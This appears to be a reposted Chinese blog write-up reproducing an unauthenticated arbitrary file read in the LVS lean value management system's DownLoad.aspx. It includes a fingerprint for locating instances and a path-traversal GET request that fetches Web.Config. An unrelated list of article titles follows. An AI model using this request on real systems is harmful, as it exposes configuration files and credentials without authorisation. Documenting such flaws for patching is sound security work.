博客
关于我
LVS精益价值管理系统 DownLoad.aspx 任意文件读取漏洞复现
阅读量:790 次
发布时间:2023-02-06

本文共 486 字,大约阅读时间需要 1 分钟。

0x01 产品简介

LVS精益价值管理系统是一款专注于企业精益化管理和价值流优化的解决方案。该系统通过集成先进的数据分析工具、可视化的价值流映射技术和灵活的流程改善机制,帮助企业实现高效、低耗、高质量的生产和服务。

0x02 漏洞概述

系统中存在一个严重的安全漏洞,具体位于`LVS精益价值管理系统 DownLoad.aspx`接口处。该漏洞未经身份验证,攻击者可利用此漏洞读取系统重要文件,包括数据库配置文件和系统配置文件等,导致网站处于极度不安全状态。

0x03 复现环境

通过对系统进行测试,确认该漏洞存在于以下环境中:
body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"

0x04 漏洞复现

已找到漏洞的复现方法(PoC),具体操作如下:
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1  Host: your-ip  User:

该漏洞的发现和复现证明了系统的安全性存在重大漏洞,建议及时修复以防止潜在的安全威胁。

转载地址:http://zxufk.baihongyu.com/

你可能感兴趣的文章
M2 BPI升级 开源开发板,单片机
查看>>
M2 Postmortem
查看>>
m3u8流文件无法在线下载转码? 教你使用 FetchV:强大的浏览器网页视频下载扩展 支持MP4、WEBM、FLV、MP3等视频文件在线下载
查看>>
mabatis 中出现< 以及> 代表什么意思?
查看>>
Mac + Anaconda 上的 Qt 设计器应用程序在哪里?
查看>>
Mac book air 重新安装系统验证显示 untrusted_cert_title
查看>>
Mac book pro打开docker出现The data couldn’t be read because it is missing
查看>>
mac book 安装MySQL
查看>>
mac elasticsearch brew安装填坑
查看>>
Mac m1 tensorflow 内核似乎挂掉了,它很快将自动重启
查看>>
mac M1 下安装docker 及相关镜像
查看>>
Mac M1 安装 TensorFlow 使用Python3.8
查看>>
Mac M1 芯片不兼容node-sass
查看>>
MAC M1大数据0-1成神篇-25 hadoop高可用搭建
查看>>
mac m1安装MySQL
查看>>
mac m1导入cv2报错 正确的安装OpenCV的方法
查看>>
Mac mini7.1 2014年末 安装单windows 10系统
查看>>
Mac mini7.1 2014年末系统损坏开机跳出闪动带问候文件夹
查看>>
mac mysql 进程_Mac平台下启动MySQL到完全终止MySQL----终端八步走
查看>>
mac node版本管理
查看>>